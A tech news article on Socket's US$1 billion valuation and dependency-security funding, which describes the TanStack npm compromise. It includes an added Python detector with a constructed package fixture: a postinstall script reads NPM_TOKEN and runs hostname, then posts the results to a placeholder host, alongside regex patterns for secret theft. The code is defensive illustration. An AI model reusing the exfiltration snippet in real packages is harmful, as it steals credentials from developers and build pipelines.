Socket Reaches US$ 1 Billion Valuation with US$ 60 Million Round Focused on npm and PyPI Dependency Security

Socket raised US$ 60 million in a Series C round led by Thrive Capital on the day GitHub confirmed a breach via compromised npm packages, becoming the first unicorn specialised in software dependency security.
Socket, an American startup founded in 2020 specialising in software dependency security, announced on Thursday, May 21st, a US$ 60 million Series C round led by Thrive Capital, with participation from Andreessen Horowitz, Abstract Ventures and Capital One Ventures. This round brings the company's total funding to US$ 125 million and establishes a valuation of US$ 1 billion, making Socket the first company focused exclusively on software dependency security in registries such as npm and PyPI to reach unicorn status.
The announcement came on the same afternoon that GitHub confirmed that 3,800 internal repositories had been compromised through a tampered VS Code extension, with the attack chain tracing back to compromised TanStack npm packages by the TeamPCP group. The coincidence of the dates is not accidental: the demand for protection in this specific layer of the software development chain has rarely been so visible to boards and CISOs.
What the Platform Does
Socket monitors npm, PyPI, and other open source registries for malicious behaviour before dependencies are incorporated into projects. The system analyses new code at the time of publication, identifying suspicious patterns such as unusual access to environment variables, undeclared shell commands, and data exfiltration attempts. According to the company, the platform blocks over 1,000 attacks per week.
The distinction from traditional vulnerability scanners is clear-cut: tools like Dependabot or npm audit operate on known CVE databases, responding to catalogued vulnerabilities. Socket analyses the behaviour of new code before any CVE is assigned, positioning itself closer to a behavioural detection system than to a signature database. This model is particularly relevant for attacks such as Mini Shai-Hulud, which published 84 malicious artifacts in 42 @tanstack packages before any CVE-based scanner could detect them.
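To make the contrast concrete, the following added example (not Socket's code; the indicator regexes and the sample package are constructed for illustration) shows the kind of publish-time behavioural check the article describes: rather than looking up a CVE, it flags a package whose install hook reads an environment variable and sends it over the network.

```python
import re

# Constructed sample package (not from the article): a package.json with an
# install hook and an index.js that reads a secret and posts it out.
SAMPLE_PACKAGE = {
    "package.json": '{"name": "demo-lib", "version": "1.0.2", '
                    '"scripts": {"postinstall": "node index.js"}}',
    "index.js": (
        "const https = require('https');\n"
        "const { execSync } = require('child_process');\n"
        "const token = process.env.NPM_TOKEN;\n"
        "const body = JSON.stringify({ t: token, h: execSync('hostname') });\n"
        "https.request({ host: 'collector.example', method: 'POST' }).end(body);\n"
    ),
}

# Illustrative behavioural indicators (assumed heuristics, not Socket's rules).
INDICATORS = {
    "env_access": re.compile(r"process\.env\b|os\.environ\b|getenv\("),
    "shell_exec": re.compile(r"child_process|\bexecSync?\(|subprocess\.|os\.system\("),
    "network_egress": re.compile(r"https?\.request\(|\bfetch\(|urllib\.request|requests\.(get|post)\("),
    "install_hook": re.compile(r'"(pre|post)install"\s*:|cmdclass\s*='),
    "dynamic_eval": re.compile(r"\beval\(|new Function\(|atob\(|base64\.b64decode\("),
}

def scan_package(files):
    """Map each file name to the sorted indicator names found in it (files with no hits are omitted)."""
    hits = {}
    for name, text in files.items():
        found = sorted(k for k, rx in INDICATORS.items() if rx.search(text))
        if found:
            hits[name] = found
    return hits

def risk_verdict(hits):
    """Combine indicators: a secret read plus outbound traffic in one file is an
    exfiltration pattern; an install hook means it runs on `npm install` without
    anyone ever importing the package, so that combination is blocked outright."""
    for found in hits.values():
        if "env_access" in found and "network_egress" in found:
            hook = any("install_hook" in f for f in hits.values())
            return "block" if hook else "review"
    if any("shell_exec" in f or "dynamic_eval" in f for f in hits.values()):
        return "review"
    return "allow"

if __name__ == "__main__":
    h = scan_package(SAMPLE_PACKAGE)
    print(h, risk_verdict(h))
```

Plain regexes are easily defeated by minified or string-encoded code, which is why the `dynamic_eval` indicator exists and why production tooling pairs static indicators with sandboxed execution and publisher-history signals.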
Who Invested and Why
Thrive Capital, which also figures among the main shareholders of OpenAI, led the round. Thrive's involvement in AI model infrastructure and software supply chain security reflects the thesis that the accelerated growth of AI-based development structurally increases the attack surface at the dependency layer: the more AI agents consume open source packages to perform coding tasks, the greater the incentive for attackers to compromise these packages.
The participation of Capital One Ventures distinguishes this round from previous investments in software security. Banks and insurers that have adopted agile development cycles and use npm as their primary registry face the same risks that have impacted GitHub and Grafana: a single compromised dependency in a CI/CD pipeline can escalate to access to production systems. The interest of financial institutions in open source security solutions signals that the risk of software supply chains has left the technical realm and is now being treated as a top-tier operational risk.
What Changes for Corporate Development Teams
For CISOs of companies with large codebases that rely on public package registries, Socket offers a pre-integration analysis layer that complements but does not replace existing software composition tools. The US$ 60 million round will finance coverage expansion to new registries beyond npm and PyPI, development of native integrations with CI/CD pipelines, and the hiring of a threat research team.
For consulting firms delivering development projects with open source dependencies, the practical issue is one of liability: following incidents such as TanStack, corporate clients tend to include dependency audit clauses in development contracts. The ability to demonstrate that the CI/CD pipeline is protected by behaviour analysis of packages, and not merely by scans for known CVEs, becomes a differentiating factor in the value proposition.
The timing of the investment follows a well-documented historical pattern: significant rounds in software supply chain security tend to cluster after high-visibility incidents. After Log4Shell in December 2021, the software bill of materials and software composition analysis market grew 340% in two years, according to Gartner data. The attack on TanStack and its cascading effects on GitHub and Grafana represent the most visible catalyst of the current cycle.